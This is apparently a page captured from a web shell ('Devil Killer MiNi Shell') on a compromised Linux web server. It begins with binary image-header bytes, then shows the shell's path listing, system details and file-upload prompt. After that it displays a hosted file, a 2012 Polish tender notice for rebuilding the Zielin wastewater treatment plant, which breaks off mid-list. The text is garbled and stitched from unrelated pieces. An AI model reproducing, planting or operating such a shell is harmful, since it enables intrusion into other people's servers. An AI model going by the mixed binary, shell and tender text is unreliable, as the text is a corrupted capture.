JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120214/43902-N-2012.html

<p class="kh_header"><b>Trzebielino: Modernizacja  i rozbudowa oczyszczalni ścieków Zielin.</b><br>
<b>Numer ogłoszenia: 43902 - 2012; data zamieszczenia: 14.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych w Trzebielinie , Trzebielino 33, 77-235 Trzebielino, woj. pomorskie, tel. 59 858 01 64, faks 59 858 01 67.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja  i rozbudowa oczyszczalni ścieków Zielin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach  Modernizacji i rozbudowy oczyszczalni ścieków Zielin (wydajność 246 m3/d)
Przedmiot zamówienia będzie realizowany na terenie istniejącej oczyszczalni ścieków w miejscowości Zielin, gm. Trzebielino, powiat bytowski.

Zakres zamówienia opisano w sposób szczegółowy w Specyfikacji Technicznej (ST), Dokumentacji Projektowej (DP) i Przedmiarze Robót (PR) stanowiących integralną część Specyfikacji Istotnych Warunków Zamówienia (SIWZ). W szczególności na etapie przygotowania oferty, oferent zobowiązany jest do sprawdzenia warunków realizacji inwestycji w przedstawionym poniżej zakresie, poprzez przeprowadzenie na własny koszt 
i ryzyko wizji lokalnej terenu inwestycji celem zdobycia wszelkich informacji niezbędnych do przygotowania prawidłowej oferty.
Oferent jest zobowiązany do sprawdzenia podanych w opisie przedmiotu zamówienia parametrów (długości, kubatury, powierzchni itp.) i uwzględnienie w ofercie zakresu wynikającego z Dokumentacji Projektowej oraz Specyfikacji Technicznej.
Oferent nie może wykorzystywać błędów lub opuszczeń w dokumentacji przetargowej, 
a o ich wykryciu winien niezwłocznie powiadomić Zamawiającego. Wszystkie roboty, które były do przewidzenia na etapie przygotowania oferty, a nie zostały zgłoszone Zamawiającemu (mimo ich braku w Dokumentacji Projektowej, Specyfikacji Technicznej, Przedmiarze Robót, a wynikające z Prawa Budowlanego, Polskich Norm lub sztuki budowlanej) nie będą wchodziły w zakres robót dodatkowych i będą musiały być wykonane na koszt własny oferenta (wykonawcy).

Inwestycja obejmuje budowę obiektów oczyszczalni ścieków, zapewniających jej funkcjonalność, wraz z infrastrukturą i kompletnym wyposażeniem oraz przeprowadzeniem rozruchu technologicznego. Zaprojektowana oczyszczalnia zajmuje obszar 6099m2 , z czego powierzchnia zabudowy to 4240 m2, drogi, place i chodniki 720 m2, resztę natomiast stanowią tereny zielone.
W ramach inwestycji przewiduje się wykonanie kompletnych obiektów w zakresie konstrukcji budowlanych, wraz z robotami towarzyszącymi, wyposażenia technologicznego, wyposażenia sprzętowo-eksploatacyjnego, instalacji technologicznych, instalacji wewnętrznych i sieci zewnętrznych, instalacji elektrycznych, wraz z kablem zasilającym, oraz sterowania zgodnie z ST, DP i PR.


2) Zamówienie obejmuje: 

Budowę mechaniczno - biologicznej  oczyszczani  ścieków w  technologii  SBR

a)	Komora  sita  z  piaskownikiem

Obiekt  w  konstrukcji  żelbetowej  w  formie  komory  zagłębionej o  wymiarach 
845 x 425 x 490 cm.
Z  komorą  zblokowane  jest  pomieszczenie  kontenerów  na  skratki  i  piasek  w  formie  budynku  z  cegły  silka  z  przykryciem  dachem   dwuspadowym.
Powierzchnia  zabudowy                        - 56,3 m2.
Kubatura:  komory,  sita  piaskownika    - 168 m3
                  Pomieszczenie  kontenerów - 73,5 m3

b)	Przepompownia  ścieków  surowych

Obiekt  istniejący  poddany  modernizacji  technologicznej  i  budowlanej. Stanowi  komorę  ścieków  w  formie  studni  żelbetowej  średnicy  4,0m  krytej  stropem  z  nadbudowanym  pomieszczeniem  pierwotnie  przeznaczonym  na  pompy. Pomieszczenie  nie  przewidziane  do  stałego  pobytu  obsługi.
       Wyposażenie  technologiczne:
 -  pompa   zatapiana  ścieków  z  podstawą, prowadnicą  i  uchwytem  górnym  Q = 11 l/s,  
H = 9,5m, N = 2,5 kW.

c)	Reaktor  SBR

Reaktor  SBR  stanowi  biologiczny  stopień  oczyszczania  ścieków  zblokowany  z  komorą  biodegradacji  wstępnej  (stopień  A - obiekt  9)   oraz  wydzieloną  komorą  stabilizacji  osadu  nadmiernego  (obiekt  15)   tworząc  jeden  blok  podzielony  na  komory.
Całość  w  konstrukcji  żelbetowej  krytej  stropem  żelbetowym  z  włazami  rewizyjnymi.
Wymiary  zbiornika  39,9 x 11,6 x 4,7m.
Na stropie reaktora posadowiony budynek  socjalno - techniczny  z  pomieszczeniem  dmuchaw.

d)	Wydzielona  komora  stabilizacji  tlenowej  osadu  

	Komora  jest  żelbetowym  zbiornikiem  krytym  stropem  ze  ścianami zdylatowanymi, przylegającymi  do  komory  reaktora  SBR  posadowionym  na  rzędnej  analogicznej  jak  reaktor  SBR. Ściany  zewnętrzne  analogicznie  jak  reaktora  SBR. Komora  o  wymiarach  zewnętrznych  w planie  760 x 1160 cm  i  wysokości  czynnej 350 cm.
      
e)	Stacja  odwadniania  osadu

Obiekt  jest  budynkiem  jednokondygnacyjnym  nie  podpiwniczonym w  technologii  tradycyjnej  częściowo  uprzemysłowionej. W  budynku  w  formie  jednej  hali  o  wymiarach  w  planie  - 870 x 610 cm   umieszczono  prasę   do  osadu  i stanowisko  przyczepy  na  osad  odwodniony  węzeł  higienizacji  osadu  wapnem  palonym. Poza  budynkiem  usytuowano  fundament  żelbetowy  na  silos  wapna  palonego.

f)	Punkt  zlewny  ścieków  dowożonych

	Wielkości  charakterystyczne - zbiornik  istniejący, adaptacja  odmulnika.
Funkcja - Magazynowanie  ścieków  dowożonych 1 ÷ 2  razy  w  tygodniu  do  10 m3. Ścieki  dowożone  do  zbiornika  wprowadzane  są  poprzez  komorą  przyjęciową z  kratą. Komora  w  konstrukcji  stal. k.o.  posadowiona  na  fundamencie  betonowym. Zgromadzone  ścieki  po  otwarciu  zasuwy  spustowej  odprowadzane  są  równomiernie   do  dopływu  na  oczyszczalnię.
Komora  istniejąca  posiada  usytuowanie  w  drodze  dojazdowej  do  punktu  zlewnego. 
Z  tych   względów  komorą  należy  przykryć  stropem  żelbetowym  przejazdowym. Dla  oczyszczenia  komory  przyjęto  spłukiwanie  wodą  technologiczną  ze  ścieku  oczyszczonego.

g)	Stacja  dmuchaw

Stanowi  osłonę  dmuchaw  i  agregatu  prądotwórczego  przed  niekorzystnymi  warunkami  atmosferycznymi.
Dmuchawy  stanowią  źródło  powietrza  do  napowietrzania  reaktora  SBR,   komór  stabilizacji  osadu, komory  biodegradacji  wstępnej, stawu  doczyszczającego.
Stacja  usytuowana  w  ciągu  budynku   socjalno  -   technicznego.
Stacja  w  formie  wiaty  ze  szkieletem  w  konstrukcji  stalowej  i  ścianami  z  bali  drewnianych  impregnowanych. Dmuchawy  na  fundamentach  betonowych  w  obudowach  dźwiękochłonnych   odpornych  na  wpływy  atmosferyczne. Dmuchawy  podłączone  do  wspólnego  rozdzielacza  3-sekcyjnego  zapewniającego  niezależne  zasilanie  po  jednej  dmuchawie  na  jedną  komorę  z  możliwością  przełączenia  przepustnicami  w  stanach  awaryjnych  lub   konieczności  podania  większej  ilości  powietrza  do  komory  dmuchawy  zgrupowanie  w  2  szeregach  ze  wspólnymi  rozdzielaczami   niepowiązanymi  ze  sobą.

h)	Płyta  składowa  osadu odwodnionego 

	Osad  odwodniony  jest  składowany  na  płycie  utwardzonej  w  formie  wiaty  zadaszonej. Składowanie  jest   konieczne  w  okresach  przerw  w  możliwościach    zagospodarowania  osadu  wynikających  z  warunków  agrotechnicznych  i  pogodowych.
Płyta  wykonana  w  formie  wiaty   przejazdowej  na  płycie  betonowej.
Płyta  posadowiona  na  podsypce  z  piasku  20 cm  i  folii  HDPE. Płyta  z  murkami  oporowymi  do  wysokości  1,0 m  w  ścianach  szczytowych  oraz  1,5m  ściany  wzdłużne. Przykrycie  płyty  przezroczyste  -  szkło  poliwęglanowe.
 	Wyposażenie  w  sprzęt:
Przyczepa  ciągnikowa  4t - szt. 1
Ciągnik  45 kW                  -  szt. 1
Miniładowarka  		  - szt. 1
z  wyposażeniem:
- glebogryzarka            - szt. 1
- szufla  kombinowana - szt. 1
- szufla  mieszająca     - szt. 1

i)	Staw  doczyszczajacy - adaptacja  obiektu  nr  5

	Obiekt  istniejący  stanowi  rów  cyrkulacyjny o  objętości  czynnej  1640 m3. Wymiary  obiektu  w  planie  76 x 19m, głębokość  czynna  1,5m.
Obiekt   adaptuje  się  na  staw  doczyszczający  ścieków  oczyszczonych  po  reaktorach  SBR. Dla  uzyskania  przepływu  jednokierunkowego  w  rowie  wykonać  ściankę  przegrodową  z  desek  przy  zakolu  2  z  wprowadzeniem  w  jej  rejon  dopływu  z  reaktora  SBR. 
Odpływ  do  przepływomierza  rurociągiem  przelewowym  ze  spustem  zamontowanym  przy  pomoście  z  przeciwnej  strony  ścianki  działowej. W  dnie  stawu  zamontowane  na przemian  strefy   napowietrzane  dyfuzorami  rurowymi  oraz  strefy  z  biostruktur  pasmowych  stymulujących  rozwój  mikroorganizmów  osiadłych. W  zakolu  1  wykorzystano  istniejące  kierownice  z  domurowaniem  ścianek  przegrodowych  z  cegły  klinkierowej  dla  wytworzenia  przepływu   labiryntowego  między  ściankami. W  labiryncie  zamontowane  biostruktury  w  formie  worków  siatkowych  wypełnionych  wiórami  drzewnymi. Biostruktury  te  stymulują  wzrost  organizmów   wykorzystujących  resztkowe  stężenia  związków  fosforu  i  azotu.
W  zakolu  2  przy  pomoście  zamontowana  pompa  zatapiana  wody  technologicznej  ze  ścieku  oczyszczonego  do  spłukiwania  studni  zbiorczej  przepompowni  ścieków    surowych  oraz  punktu  zlewnego  ścieków  dowożonych. 

j)	Zbiornik  retencyjno - awaryjny  ścieków surowych

	Dla  sytuacji  awaryjnych  oraz  dopływów  nadmiarowych  wód  przypadkowych do  przepompowni  wykonano  w  studni  SO15  przelew  nadmiarowy  wyprowadzony do obiektu nr  6.
Obiekt  ten  stanowi  istniejący  osadnik  wtórny, który  po  modernizacji  oczyszczalni nie  jest  konieczny  w  dotychczasowej  funkcji.
W  okresach  dużego  napływu  wód  obcych  lub  stanach  awaryjnych  pompowni  ścieków  surowych, ścieki  przelewem  dopływają   do  obiektu. Opróżnianie  następuje  wg  bieżącej  decyzji  obsługi  pompą  zatapianą  w  dnie.
Rurociąg  tłoczny  prowadzony  poprzez  komorę  zasuwy  w  studni  z  kręgów O 1200 mm  włączony  jest  w  dalszej  trasie  w  tłoczny  rurociąg  ścieków z  przepompowni  do  reaktora.
Wielkości  charakterystyczne:
	Średnica  wewnętrzna D = 6,0m
	Głębokość  całkowita - 8m
	Powierzchnia  zabudowy - 34,2 m2
	Objętość  czynna - 145 m3

k)	Przepływomierz  ścieków  oczyszczonych

Przepływomierz  stanowi  obiekt  istniejący  w  konstrukcji  żelbetowej  poddany  regeneracji  konstrukcji  i  modernizacji  układu  pomiarowego.
Wielkości  charakterystyczne:
	Wymiary  komory  360 x 120 x 280cm
	Powierzchnia  zabudowy - 4,3 m2
	Zakres  pomiaru  przepływów - 0 ÷ 40 dm3/s.

l)	Budynek obsługowo - techniczny

- pow. zabudowy - 232,2m2
- pow. użytkowa -  212,7m2
- kubatura	  -   1040m3

m)	Wylot   ścieków  oczyszczonych

Wylot  ścieków   oczyszczonych  następuje  do  rowu  melioracyjnego  i  dalej  do  rz. Bystrzenicy. Podłoże  z  torfów  w  końcowym  odcinku  kolektora  i  rowu  determinują  wykonanie  wylotu  jako  rurowy  bez  konstrukcji  żelbetowej.

n)	Rozprowadzenie  wody  po  oczyszczalni
o)	Zagospodarowanie  terenu  działki  pod  oczyszczalnię

W   ramach  prac  przygotowawczych  należy  wykonać  demontaż  istniejących  poletek  osadowych.
Przyjęto  wjazd  na  oczyszczalnię  z  istniejącej   drogi  gminnej dojazdowej  projektowanej do utwardzenia. Szerokość  drogi 3 m z mijanką. Utwardzenie płyty żelbetowe wielootworowe na podbudowie z  tłucznia.
Odwodnienie  dróg  powierzchniowe. Nawierzchnia  z  kostki  betonowej  brukowej,  obramowanie  
z  krawężników  betonowych  13 x 30 cm  ułożonych  na  podsypce  cementowo  piaskowej  i  ławie  betonowej  z  oparciem  z  betonu  B-15.
Ogrodzenie  terenu z cokołu    z   krawężnika  drogowego   z  obsadzeniem  stalowych  słupków
w  gniazdach  betonowych  z  zamocowaniem   siatki  ocynkowanej  gr. 3,2 mm  na  linkach  stalowych  wraz  z  bramą  wjazdową  i  furtką.
Projektuje  się  zieleń  izolacyjną   niską  w formie nasadzeń uzupełniających w  obrębie  ogrodzenia.

p)	Instalacja elektryczna

W zakresie instalacji elektrycznych zaplanowano wykonanie:
-	złącza kablowego;
-	zasilanie tablicy głównej;
-	instalacja oświetlenia wewnętrznego; 
-	instalacja oświetlenia zewnętrznego;
-	instalacje urządzeń technologicznych;
-	instalacje gniazd wtykowych 230V, 400V;
-	instalacje wyrównawcze;
-	głównej tablicy rozdzielczej;
-	skrzynki kablowo pomiarowej.

q)	układ sterowania AKPiA z wizualizacją pracy obiektów w sterowni budynku technologicznego

r)	dla zakresu oczyszczalni wykonanie w ramach ceny kontraktowej:

- wykonanie prób szczelności dla 100% wykonywanych sieci z dokumentacją, 
- wykonanie wszystkich dokumentów, opracowań, uzgodnień, zgodnie w wymogami Prawa Budowlanego, a wymaganych na etapie budowy, a w szczególności kompletną dokumentację odbioru ostatecznego, wraz z dokumentacją  powykonawczą, 
- wykonanie operatów z uzyskaniem wymaganych pozwoleń wodno - prawnych, 
- wykonanie rozruchu oczyszczalni 
- wykonanie instrukcji eksploatacji dla oczyszczalni ścieków, 
- wyposażenie  oczyszczalni  w sprzęt BHP zgodnie z Rozporządzeniem  Ministra Gospodarki Przestrzennej i Budownictwa  z dnia 1 października 1993r, w sprawie bezpieczeństwa i higieny pracy w oczyszczalniach ścieków,
- wykonanie geodezyjnej dokumentacji powykonawczej w formie autoryzowanego wydruku z opisem oraz na nośniku elektronicznym,
- wykonanie technicznej dokumentacji powykonawczej w formie autoryzowanego wydruku z opisem i na nośniku elektronicznym, wraz z wymaganymi certyfikatami, atestami, oświadczeniami zgodności dotyczącymi materiałów zgodnie z ustawą 
o wyrobach budowlanych,
- do obowiązków Wykonawcy należy również uzyskanie decyzji pozwolenia na użytkowanie obiektu


Do obowiązków Wykonawcy należy również uporządkowanie terenu oraz naprawy wszelkich ewentualnych uszkodzeń, powstałych w rezultacie robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.00-9, 45.11.12.00-0, 45.23.32.26-9, 45.23.13.00-8, 45.23.14.00-9, 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany wnieść, przed upływem terminu składania ofert, na czas związania ofertą, wadium         w wysokości 120 000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>:  wymaga się aby Wykonawca         a) wykazał wykonanie w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  w charakterze generalnego wykonawcy, co najmniej 2 roboty budowlane o wartości co najmniej 6.000.000,00 złotych brutto każda, w tym jedną oczyszczalnię ścieków o wydajności min. 250 m3/d. Każda z robót winna zawierać co najmniej jeden obiekt o kubaturze  min. 2 000 m3 z podaniem ich rodzaju, wartości, daty i miejsca wykonania; oraz 
b) załączył dokumenty potwierdzające , że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone .
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych w ofercie, wymaganych przez Zamawiającego, w systemie spełnia-niespełnia, potwierdzających spełnianie tych warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby Wykonawca  dysponował : a) kierownikiem budowy - branża budowlana, min. 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
b) kierownikiem robót  branży sanitarnej - min. 1 osoba posiadająca uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
c) kierownikiem robót  branży elektrycznej - min. 1 osoba posiadająca uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
d) kierownikiem robót  branży drogowej- min. 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych w ofercie, wymaganych przez Zamawiającego, w systemie spełnia-niespełnia, potwierdzających spełnianie tych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby Wykonawca  : a) osiągnął w każdym z ostatnich 3 lat obrotowych ( 2009, 2010, 2011r) min. 12 mln obrotu,
b) posiadał środki finansowe w wysokości min. 2,5 mln zł lub zdolność kredytową wysokości min. 2,5 mln zł,
c) posiadał ubezpieczenie w zakresie prowadzonej działalności w wysokości min. 3,0 mln zł.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych w ofercie, wymaganych przez Zamawiającego, w systemie spełnia-niespełnia, potwierdzających spełnianie tych warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

